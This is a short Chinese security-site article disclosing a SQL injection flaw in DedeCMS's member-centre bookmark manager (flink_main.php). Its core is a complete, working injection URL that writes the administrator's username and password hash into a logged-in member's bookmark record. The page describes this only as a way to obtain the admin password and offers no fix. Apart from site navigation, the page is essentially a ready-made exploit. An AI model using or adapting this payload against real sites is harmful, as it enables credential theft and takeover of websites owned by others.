频道栏目
首页 > 安全 > 网站安全 > 正文

DedeCMS会员中心书签管理SQL注射漏洞

2012-12-29 11:01:09         来源:0x50sec.org   作者:c4rp3nt3r
收藏   我要投稿

DedeCMS会员中心SQL注射漏洞

需要magic_quotes_gpc = Off

会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.

 

DedeCMS会员中心书签管理SQL注射漏洞

成功利用该漏洞可获得管理员密码

 

会员登录后可以执行SQL语句查询数据库任意内容如管理员密码

 

http://www.2cto.com /member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r

 

上一篇:C-Panel Cross Site Scripting
下一篇:WordPress Asset-Manager PHP文件上传漏洞及修复
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站